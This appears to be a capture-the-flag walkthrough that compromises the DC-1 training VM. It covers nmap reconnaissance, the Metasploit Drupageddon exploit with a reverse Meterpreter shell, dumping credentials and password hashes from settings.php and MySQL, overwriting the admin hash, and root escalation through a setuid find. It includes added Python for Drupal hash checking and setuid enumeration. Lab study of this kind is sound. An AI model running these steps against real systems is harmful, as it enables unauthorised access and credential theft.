[Penetration Testing][Kali] Penetration test of the DC-1 target VM



1. Setting up the test environment

Kali 2018, the DC-1 target VM, VMware as the virtualisation platform

2. Preparation

Use nmap to discover the hosts on the local network (a ping sweep; run as root so that ARP is used and the MAC addresses with their vendor names are shown):

Shell command

nmap -sn 192.168.12.0/24

Shell output

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 10:27 CST
Nmap scan report for 192.168.12.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:00 (VMware)
Nmap scan report for 192.168.12.129
Host is up (0.00026s latency).
MAC Address: 00:0C:29:BF:AE:30 (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:BC:D6 (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 27.95 seconds

Four hosts are up. 192.168.12.1 is the physical host's VMware adapter, 192.168.12.128 is this Kali machine and 192.168.12.254 is another VMware-owned address (by its MAC prefix, the NAT/DHCP service), which leaves 192.168.12.129 as DC-1; opening it in a browser confirms this. The DC-1 HTTP page is shown below. The footer says "Powered by Drupal", so the site runs on the Drupal CMS. Nothing else of value is visible on the page.

(Screenshot: DC-1 home page, footer reading "Powered by Drupal")

3. Port scan

Next, a full TCP port scan of 192.168.12.129 with service and version detection returned the following:

Shell command

root@kali:~# nmap -p- -A -v 192.168.12.129

Shell output

Nmap scan report for 192.168.12.129
Host is up (0.00047s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          41785/udp  status
|_  100024  1          56404/tcp  status
56404/tcp open  status  1 (RPC #100024)

The scan shows four open ports. The banners (OpenSSH 6.0p1 Debian 4+deb7u7, Apache 2.2.22) point to Debian 7, and the http-generator meta tag already identifies Drupal 7. The scan also found a robots.txt on port 80, so we fetch it directly. It lists a number of installation, upgrade and licence text files as well as maintenance scripts:

File: robots.txt (excerpt)

Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php

Reading through these files, UPGRADE.txt carries version information consistent with Drupal 7, matching the nmap result; nothing else of value turned up. (If CHANGELOG.txt is readable it names the exact point release, which is what decides which exploits apply.)

4. Scanning the site's directories with msfconsole

robots.txt gave little, so try the directory scanner module in msfconsole:

Shell command

root@kali:~# msfconsole
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.12.129	# target address
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 20	# number of concurrent threads
msf5 auxiliary(scanner/http/dir_scanner) > show options
msf5 auxiliary(scanner/http/dir_scanner) > run	# start the scan

Shell output

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.12.129                                           yes       The target address range or CIDR identifier
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     20                                                       yes       The number of concurrent threads
   VHOST                                                                no        HTTP server virtual host

[*] Detecting error code
[*] Using code '404' as not found for 192.168.12.129
[+] Found http://192.168.12.129:80/.CVS/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/.../ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/0/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/Admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/USER/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/admin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/batch/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/cgi-bin/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/icons/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/includes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/misc/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/modules/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/node/ 200 (192.168.12.129)
[+] Found http://192.168.12.129:80/profiles/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/scripts/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/search/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/sites/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/themes/ 403 (192.168.12.129)
[+] Found http://192.168.12.129:80/user/ 200 (192.168.12.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Unfortunately most of the paths found return 403, and the few 200s (/0/, /USER/, /node/, /user/) are standard Drupal paths that reveal nothing new; /user/ is the login form, which becomes useful later.

5. Searching msfconsole for Drupal modules and trying them

Shell command

msf5 > search drupal

Shell output

Matching Modules
================

   Name                                           Disclosure Date  Rank       Check  Description
   ----                                           ---------------  ----       -----  -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

Try these one by one. The first, auxiliary/gather/drupal_openid_xxe, an external entity injection through OpenID, did not work against this target. The second, auxiliary/scanner/http/drupal_views_user_enum, a user enumeration scanner for the Views module, did not work either. The third, exploit/multi/http/drupal_drupageddon, exploits the SQL injection in Drupal 7.x before 7.32 (Drupalgeddon, CVE-2014-3704) and turns it into PHP code execution; its default payload is a PHP Meterpreter that connects back to this Kali host:

Shell command

msf5 > use exploit/multi/http/drupal_drupageddon
msf5 exploit(multi/http/drupal_drupageddon) > set RHOSTS 192.168.12.129
msf5 exploit(multi/http/drupal_drupageddon) > run

Shell output

RHOSTS => 192.168.12.129

[*] Started reverse TCP handler on 192.168.12.128:4444 
[*] Sending stage (38247 bytes) to 192.168.12.129
[*] Meterpreter session 1 opened (192.168.12.128:4444 -> 192.168.12.129:59507) at 2019-07-15 11:17:35 +0800

meterpreter >

It worked. Running ls in the web root shows a flag1.txt, so cat it.

Shell command

meterpreter > ls
meterpreter > cat flag1.txt

Shell output (excerpt)

Every good CMS needs a config file - and so do you.

First hint: find Drupal's configuration file. A quick search shows that Drupal's settings file lives, by default, at sites/default/settings.php relative to the web root.

Shell command

cd sites/default/
cat settings.php

Shell output (excerpt)

<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

That gives flag2 and a username and password for the local MySQL server, so the next step is to look in the database for anything useful.

6. Working in the database

Typing mysql -udbuser -p at the meterpreter prompt is rejected as an unknown command, because it is not a Meterpreter command. Enter shell to drop to the target's own /bin/sh, run mysql -udbuser -p again and supply the password R0ck3t. This shell has no pseudo-terminal, so the mysql prompt and echo are missing, but queries still execute; select * from users\G in the drupaldb database returns the site's accounts with their hashed passwords (hashes, not reversible ciphertext):

MySQL console output

*************************** 1. row ***************************
             uid: 0
            name: 
            pass: 
            mail: 
           theme: 
       signature: 
signature_format: NULL
         created: 0
          access: 0
           login: 0
          status: 0
        timezone: NULL
        language: 
         picture: 0
            init: 
            data: NULL
*************************** 2. row ***************************
             uid: 1
            name: admin
            pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
            mail: admin@example.com
           theme: 
       signature: 
signature_format: NULL
         created: 1550581826
          access: 1550583852
           login: 1550582362
          status: 1
        timezone: Australia/Melbourne
        language: 
         picture: 0
            init: admin@example.com
            data: b:0;
*************************** 3. row ***************************
             uid: 2
            name: Fred
            pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
            mail: fred@example.org
           theme: 
       signature: 
signature_format: filtered_html
         created: 1550581952
          access: 1550582225
           login: 1550582225
          status: 1
        timezone: Australia/Melbourne
        language: 
         picture: 0
            init: fred@example.org
            data: b:0;

Drupal 7 stores passwords as salted, iterated SHA-512 hashes (the $S$ prefix), so recovering the original from the hash is only possible by brute force. Work the other way round instead: hash a password of our choice and write that hash into the database. That requires the exact hashing scheme, and guessing it from the hash alone is unreliable (a CMS may combine its own salt layout, iteration count and encoding), so use Drupal's own tool. The Drupal documentation at https://www.drupal.org/node/1023428 points to the script scripts/password-hash.sh shipped with Drupal 7; run it from the web root:

Shell command

php scripts/password-hash.sh 123456

Shell output

password: 123456 		hash: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu

The script cannot be run from inside the scripts directory: it defines DRUPAL_ROOT as the current working directory and includes includes/password.inc and its dependencies relative to that, so from scripts/ those includes are not found and it errors out.
With the hash in hand, write it into the database. I ran into errors on the update at first and eventually got it through by typing the statement in pieces; the hash must be given as a string in single quotes, since MySQL reads a backtick-quoted value as a column name.

MySQL console commands

mysql -udbuser -pR0ck3t
use drupaldb;
update users set pass='$S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu' where uid=1;
select * from users\G

MySQL console output (excerpt)

*************************** 2. row ***************************
             uid: 1
            name: admin
            pass: $S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu
            mail: admin@example.com
           theme: 
       signature: 
signature_format: NULL
         created: 1550581826
          access: 1550583852
           login: 1550582362
          status: 1
        timezone: Australia/Melbourne
        language: 
         picture: 0
            init: admin@example.com
            data: b:0;
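
The hashing behind these $S$ strings, as an added example that is not part of the original write-up or of Drupal's code: a Python reimplementation of Drupal 7's password hash as specified in includes/password.inc (salted SHA-512 iterated 2**count_log2 times, where count_log2 is the ITOA64 index of the character after $S$, so 'D' means 2**15 rounds, encoded with the phpass alphabet and truncated to 55 characters). With it, a hash copied out of the users table can be checked against candidate passwords offline, and a replacement hash can be produced without running password-hash.sh on the target. The only data it uses are the page's own hash for 123456 and the string R0ck3t as a sample password.

```python
"""Drupal 7 password hashing ($S$), reimplemented in Python.

Added example, not code from the write-up or from Drupal.  It follows the
algorithm in Drupal 7's includes/password.inc so that a hash taken from the
users table can be checked against candidate passwords offline, or a fresh
hash can be produced without running scripts/password-hash.sh on the target.
"""
import hashlib
import hmac
import os

# phpass alphabet used by _password_base64_encode(); also indexes the iteration count
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55                   # DRUPAL_HASH_LENGTH: stored hashes are cut to this
DEFAULT_COUNT_LOG2 = 15            # DRUPAL_HASH_COUNT: 2**15 SHA-512 rounds ('D' in $S$D...)
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30


def _phpass_b64(data: bytes) -> str:
    """Unpadded base64 over ITOA64, little-endian per 3-byte group (phpass encode64)."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> str:
    """Hash PASSWORD under SETTING, the first 12 chars of a stored hash:
    '$S$' + one ITOA64 char giving log2(rounds) + an 8-char salt (_password_crypt)."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("malformed setting")
    count_log2 = ITOA64.index(setting[3])          # ValueError if not in the alphabet
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        raise ValueError("iteration count out of range")
    salt = setting[4:12].encode("ascii")
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):               # PHP: do { ... } while (--$count);
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _phpass_b64(digest))[:HASH_LENGTH]


def hash_password(password: str, count_log2: int = DEFAULT_COUNT_LOG2) -> str:
    """New stored hash with a random salt, what user_hash_password() / password-hash.sh print."""
    setting = "$S$" + ITOA64[count_log2] + _phpass_b64(os.urandom(6))   # 6 bytes -> 8 chars
    return drupal7_crypt(password, setting)


def check_password(password: str, stored: str) -> bool:
    """Does PASSWORD match a stored '$S$' hash?  Constant-time compare of the recomputed hash.
    Legacy $P$/$H$ (phpass md5) and 'U$' (Drupal 6 md5, rehashed) forms are not handled."""
    if not stored.startswith("$S$") or len(stored) != HASH_LENGTH:
        return False
    try:
        return hmac.compare_digest(drupal7_crypt(password, stored), stored)
    except ValueError:                              # malformed count or salt
        return False


if __name__ == "__main__":
    # Hash printed by password-hash.sh on the target for the password 123456
    page_hash = "$S$DRP9A87VYWMUnTb4Dl7yivYAlibCNONO32cCB3Qc1LT5Alr90rAu"
    print(check_password("123456", page_hash))        # True
    print(hash_password("R0ck3t"))                    # a new $S$D... hash on every run
```

check_password("123456", hash) returns True for the hash printed by password-hash.sh above, which also confirms the script's output was copied correctly before it goes into the users table. Only the $S$ form is implemented; Drupal 7 also accepts legacy $P$/$H$ phpass md5 hashes and md5 hashes rehashed on upgrade (prefix U$), which check_password reports as no match.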

7. Logging in as admin through the web interface

Log in as admin at /user/ with the password we set, 123456; the Content page lists flag3:
(Screenshot: Drupal content list showing the flag3 node)
Open it to read it.

Contents of flag3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

The capitalised words are the hint: special PERMissions (a setuid bit) on the find binary, whose -exec option runs a command, are the way to what is in the shadow file. It also mentions passwd, so start by reading /etc/passwd.

8. After flag3

Shell command

cat /etc/passwd

Shell output

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

It names the flag4 user directly, with home directory /home/flag4, so look there:

Shell command

cd /home/flag4
ls
cat flag4.txt

Shell output (contents of flag4.txt)

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

This tells us we need to escalate privileges. Following flag3, find is the vehicle: if /usr/bin/find is owned by root and carries the setuid bit, it runs with effective uid 0, and its -exec option runs an arbitrary command as that user. Confirm that the setuid bit is actually set before relying on it (the hint says so, but on a real engagement you check); then run find on anything at all and let -exec spawn a shell.
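
The check the hint points at, as an added example that is not from the write-up: a Python equivalent of the usual find / -perm -4000 -type f 2>/dev/null sweep, which lists setuid executables under a directory tree and reports which are root-owned, since only those yield root. Symlinks are ignored (the kernel honours the bit on the real file only) and other filesystems are not crossed, like find's -xdev. The path /usr/bin/find and the names passed to setuid_named are illustrative.

```python
"""Enumerate setuid executables: the "special PERMS" check from flag3.

Added example, not part of the original write-up.  It does what
`find / -perm -4000 -type f 2>/dev/null` does on the target, but returns
the results so they can be filtered (for example for known escalation
candidates such as find) instead of only printing them.
"""
import os
import stat
from typing import Iterator, List


def is_setuid(path: str) -> bool:
    """True if PATH is a regular file with the setuid bit (04000) set.

    lstat() is used on purpose: the kernel honours the bit on the real file
    only, so a symlink pointing at a setuid binary is not reported.
    """
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def is_setuid_root(path: str) -> bool:
    """A setuid bit only yields root if the file is also owned by uid 0."""
    return is_setuid(path) and os.lstat(path).st_uid == 0


def _is_dir_on_device(path: str, dev: int) -> bool:
    """Real directory (not a symlink) on the same filesystem as the scan root."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and st.st_dev == dev


def iter_setuid(root: str) -> Iterator[str]:
    """Yield setuid regular files under ROOT without crossing filesystems
    (like find's -xdev, which keeps /proc, /sys and other mounts out)."""
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        # prune symlinked directories and mount points in place so os.walk skips them
        dirnames[:] = [d for d in dirnames
                       if _is_dir_on_device(os.path.join(dirpath, d), root_dev)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_setuid(path):
                yield path


def setuid_binaries(root: str = "/") -> List[str]:
    """Sorted list of setuid files under ROOT."""
    return sorted(iter_setuid(root))


def setuid_named(root: str, *names: str) -> List[str]:
    """Setuid files under ROOT whose basename is one of NAMES, e.g. 'find'."""
    wanted = set(names)
    return [p for p in setuid_binaries(root) if os.path.basename(p) in wanted]


if __name__ == "__main__":
    # On DC-1 the root-owned entries include /usr/bin/find, which is what
    # makes the -exec escalation below work.
    for p in setuid_binaries("/"):
        print(("root " if is_setuid_root(p) else "     ") + p)
```

Run it as the unprivileged www-data shell on the target (or on any box you want to audit); an entry marked root whose program will run arbitrary commands, as find does through -exec, is the escalation path. The same scan is how you find the bit being set where it should not be during a hardening review.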

9. Privilege escalation with find

Shell command

find . -exec /bin/sh \;	# /bin/sh is dash on Debian 7 and keeps the euid 0 inherited from setuid find
whoami
cd /root  	
ls
cat thefinalflag.txt

Shell output

root
thefinalflag.txt

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Root and the final flag obtained; game over.

Afterword

A few key points:

  • The foothold is exploit/multi/http/drupal_drupageddon, Metasploit's exploit for the Drupal 7 (<7.32) SQL injection CVE-2014-3704. It is not a read-only exploit: it writes to the site's database (among other things creating an administrator account) and enables PHP code execution on its way to the Meterpreter session, so on a real engagement record what it changed so it can be cleaned up.

  • Privilege escalation is a setuid find with -exec. The command it runs must be /bin/sh: on Debian 7 that is dash, which keeps the effective uid 0 inherited from find. bash resets its effective uid to the real uid when the two differ unless it is started with -p, which is why spawning /bin/bash and other shells came back without root.

  • After drupageddon and shell, if there is no command prompt or no echo, the session has no pseudo-terminal. Spawn one from Python (no root needed):

python -c 'import pty;pty.spawn("/bin/sh")'